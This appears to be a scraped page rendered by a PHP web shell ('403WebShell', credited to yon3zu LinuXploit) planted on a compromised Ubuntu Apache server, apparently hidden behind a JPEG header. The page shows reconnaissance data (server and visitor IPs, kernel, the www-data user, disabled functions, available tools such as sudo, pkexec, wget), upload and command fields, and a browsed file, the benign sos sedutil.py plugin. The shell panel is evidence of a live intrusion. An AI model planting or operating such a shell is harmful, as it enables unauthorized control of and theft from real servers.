����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����403WebShell
403Webshell
Server IP : 74.208.127.88  /  Your IP : 216.73.216.50
Web Server : Apache/2.4.41 (Ubuntu)
System : Linux ubuntu 5.4.0-163-generic #180-Ubuntu SMP Tue Sep 5 13:21:23 UTC 2023 x86_64
User : www-data ( 33)
PHP Version : 7.4.3-4ubuntu2.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/thread-self/root/usr/lib/python3/dist-packages/sos/report/plugins/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/thread-self/root/usr/lib/python3/dist-packages/sos/report/plugins/sedutil.py
# This file is part of the sos project: https://github.com/sosreport/sos
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# version 2 of the GNU General Public License.
#
# See the LICENSE file in the source distribution for further information.

from sos.report.plugins import Plugin, IndependentPlugin, PluginOpt


class SEDUtility(Plugin, IndependentPlugin):
    """
    Collects information about SED drives installed on host system.
    This plugin will capture data using sedutil utility
    """

    short_desc = 'Self Encrypting Drives'
    plugin_name = 'sedutil'
    profiles = ('security', 'system', 'storage', 'hardware')
    packages = ('sedutil',)

    option_list = [
        PluginOpt('debug', default=False, desc='capture debug data'),
    ]

    def setup(self):
        sed_list = []
        result = self.collect_cmd_output('sedutil-cli --scan')

        if self.get_option("debug"):
            if 0 == result['status']:
                # iterate over all the devices returned and
                # create a list of SED drives.
                for line in result['output'].splitlines():
                    if line.startswith("/dev/"):
                        line = line.split()
                        disk, tcg_opal_dev = line[:2]
                        # Check if it is SED device or not
                        if "2" == tcg_opal_dev:
                            sed_list.append(disk)
            self.do_debug(sed_list)

    def do_debug(self, sed_list):
        """ Collect debug logs """
        for device in sed_list:
            self.add_cmd_output(f"sedutil-cli --query {device}")

# vim: set et ts=4 sw=4 :

Youez - 2016 - github.com/yon3zu
LinuXploit